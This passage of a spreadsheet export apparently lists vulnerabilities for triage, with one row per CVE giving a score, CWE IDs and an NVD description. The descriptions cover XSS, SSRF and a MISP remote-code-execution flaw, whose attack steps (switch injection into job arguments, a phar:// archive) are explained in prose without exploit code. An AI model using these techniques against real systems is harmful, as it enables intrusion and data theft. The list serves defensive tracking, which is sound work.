        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, an authenticated uploader can submit an image/svg+xml assistant UI logo through PATCH /api/v1/system/assistant/ui, and SQLBot stores the SVG without sanitizing or validating embedded active content. SQLBot later serves the file inline from the same application origin through GET /api/v1/system/assistant/picture/{filename}. When another user loads that generated resource, JavaScript embedded in the SVG executes in the SQLBot web application context, resulting in stored cross-site scripting with access to data and actions available to the victim's session. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53555</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92932</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-670, CWE-918</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>In the MISP sachertortephp library, the Xml::build() static method in lib/Cake/Utility/Xml.php contains a logic error in the conditional that gates network-based XML fetching. The original condition was written as: $options['readFile'] &amp;&amp; strpos($input, 'http://') === 0 || strpos($input, 'https://') === 0. Because PHP's &amp;&amp; operator has higher precedence than ||, the expression is evaluated as ($options['readFile'] &amp;&amp; strpos($input, 'http://') === 0) || strpos($input, 'https://') === 0. As a result, when a caller explicitly sets the readFile option to false to disable file and URL reading, an input string beginning with https:// still satisfies the condition and triggers a network fetch via HttpSocket (configured to follow up to 10 redirects). The http:// branch is correctly gated by the readFile flag, but the https:// branch is not. An attacker who can influence the $input parameter passed to Xml::build() can therefore force the application to issue an outbound HTTPS request to an attacker-controlled or internal URL, even though the caller intended to suppress all remote reads. The fetched response is parsed as XML and may be returned to the caller, enabling information disclosure from internal services or external targets. This constitutes a Server-Side Request Forgery (SSRF) weakness with an information-disclosure impact. The vulnerability requires that the code path in Xml::build() be reachable with attacker-controlled input and that the readFile option be set to false (or the caller expects it to be false).</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92932</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93295</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-74</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>MISP contains a vulnerability in its background job dispatch mechanism that allows remote code execution as the web user. Background job arguments are passed directly as the argv of the CakePHP console process. CakePHP's ShellDispatcher::_parsePaths() scans the entire argv for path switches (-app, --app, -working, --working, -root, --root, -webroot, --webroot) and uses the following element as the application root. The events/contact endpoint passes user-controlled fields (message and person) into job arguments without validation. An attacker who can submit the contact form can set the person field to a reserved switch (e.g., -app) and the message field to a phar:// URI pointing to a malicious archive. The CakePHP bootstrap then includes Config/core.php from within that archive, executing attacker-controlled PHP code with the privileges of the web user. The vulnerability requires the ability to submit the events/contact form (or any other endpoint that forwards user input into background job arguments). No special timing or race condition is required; the attack is deterministic once the crafted parameters are accepted. The impact is full remote code execution in the context of the MISP web server process, allowing data exfiltration, persistence, and lateral movement within the host.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93295</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93296</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>MISP contains a stored cross-site scripting (XSS) vulnerability in the Overmind theme's statistics views. The event General card (event_general.ctp) and the server/feed preview card (preview_general.ctp) constructed donut chart legend labels by directly concatenating object name or category keys into an innerHTML string without HTML-encoding. Because MISP object names (e.g., attribute names, event names, or server/feed identifiers) are user-controllable by any authenticated user with sufficient permissions to create or modify such objects, an attacker could craft a name containing malicious markup (for example, a script tag or event-handler attribute). When any other user viewed the affected Overmind dashboard, the injected markup would be interpreted as live HTML/JavaScript in the victim's browser, executing in the context of the MISP application origin. This could allow session hijacking, data exfiltration, or arbitrary actions performed on behalf of the victim. The vulnerability requires the attacker to have low-level authenticated access to create or rename an object whose name is rendered in the legend, and the victim to view the Overmind event or server preview page. No special browser conditions or race conditions are required.</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93296</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54546</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr">
        <is>
          <t>npm:@tak-ps/cloudtak</t>
        </is>
      </c>
      <c r="M346" s="5" t="inlineStr">
        <is>
          <t>13.22.1</t>
        </is>
      </c>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>CloudTAK is a browser-based Common Operating Picture and situational awareness tool compatible with TAK. Prior to 13.22.1, the authenticated PUT /api/basemap endpoint passes an attacker-controlled URL through importBasemapURL() in api/routes/basemap.ts to fetch(url) without resolved-address classification or redirect revalidation. BasemapProtocol.isValidURL in api/lib/interface-basemap.ts checks only the HTTP or HTTPS scheme and is not applied on the vulnerable import path. Direct internal addresses, alternate IP encodings, and redirects to internal addresses can reach cloud metadata, loopback, private, and CGNAT HTTP services. The OptionalTileJSON response reflects fields including name, attribution, and tiles[0] to the caller, making the request forgery full-read rather than blind and enabling cloud credential theft and internal service disclosure. This issue is fixed in version 13.22.1.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54546</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50603</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer Agent Service component included with NitroSense and PredatorSense. The vulnerability is caused by the use of a hard-coded AES encryption key within the software. Under certain circumstances, a local attacker may be able to use the embedded key to access protected information or perform unauthorized actions.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50603</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50604</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>8fc372e3-d9c5-46e4-9410-38469745c639</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in the Acer Agent Service component included with NitroSense and PredatorSense. The socket handshake process does not properly require authentication before granting access to the service. Under certain circumstances, an unauthorized connection may be established, potentially allowing access to functionality that should be restricted.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50604</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91019</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>The Event Booking Manager for WooCommerce  WordPress plugin before 5.6.0 does not restrict who can view its stored payment gateway configuration, allowing users with Contributor-level access and above to read the site's PayPal and Stripe credentials, including their secret keys.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91019</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92921</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-916</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 stores account passwords using single-round MD5 with only the username as salt and no key derivation function. Attackers with database access can recover plaintext passwords through offline dictionary or brute-force attacks due to negligible computational effort.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92921</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54645</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, admin/sources/products.index.inc.php reads the description, description_short, and spec_copy rich-text fields from $GLOBALS['RAW']['POST'] and removes only script elements before the values are stored and rendered through Smarty templates. An administrator with product-editing rights can store event-handler attributes, SVG content, or javascript: URIs that bypass this filter, causing persistent JavaScript execution when a storefront visitor or another administrator views the product content and enabling session exposure or unauthorized browser-context actions. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54645</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86824</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-326</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>The Newsletter  WordPress plugin before 9.3.8 does not generate its email tracking signing key with sufficient entropy and signs its tracking links with an unkeyed hash, allowing an unauthenticated attacker who recovers that key offline to forge tracking links, obtain any subscriber's session token, and read and modify that subscriber's stored personal data.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86824</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92611</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-863</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ankaios versions 0.6.0 to before 1.0.4, `LogRule::matches` in the agent control-interface authorizer stops at the first wildcard pattern in a single rule instead of evaluating later entries, which can cause deny `LogRule` entries to be skipped and allow unauthorized access to another workload's logs.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92611</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54565</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-1385, CWE-200, CWE-359, CWE-918</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>rhwp is an HWP viewer and editor implemented in Rust and WebAssembly. Prior to rhwp 0.7.15 and rhwp Chrome and Firefox extension 0.2.4, the browser extensions use an all-URLs host permission to detect HWP and HWPX links on visited pages, but the service workers do not validate message senders, URL schemes, or destination addresses before privileged fetches. The affected paths are rhwp-chrome/manifest.json, rhwp-chrome/content-script.js, rhwp-chrome/sw/message-router.js, rhwp-chrome/sw/thumbnail-extractor.js, rhwp-firefox/manifest.json, rhwp-firefox/content-script.js, rhwp-firefox/sw/message-router.js, and rhwp-firefox/sw/thumbnail-extractor.js. An untrusted page can make the fetch-file and extract-thumbnail handlers request localhost or private-network resources. When a target HWP or HWPX file contains an extractable PrvImage, the extension returns the preview as a data URI in page-readable DOM, allowing page script to read it. The flaw also permits internal-resource existence and port probing and extension presence or version fingerprinting. Exploitation requires a user to visit an untrusted page while the extension is enabled, and preview disclosure is limited to an extractable PrvImage. This issue is fixed in rhwp 0.7.15 and rhwp Chrome and Firefox extension 0.2.4.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54565</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54495</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>The OpenFeature Operator allows users to expose feature flags to applications. In version 0.9.2 and earlier, a tenant who can create a controller-owned workload can use the openfeature.dev/featureflagsource annotation with NAMESPACE/NAME syntax to reference a FeatureFlagSource or InProcessConfiguration in another namespace. On multi-tenant clusters that use namespaces as trust boundaries, the cluster-scoped operator reads that resource and materializes spec.envVars literal values, spec.httpSyncBearerToken, sync URIs, and supporting ConfigMaps into the tenant's workload. Single-tenant clusters are not impacted, secretKeyRef and configMapKeyRef values remain namespace-local, and creating a FeatureFlagSource is not required.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54495</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54551</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
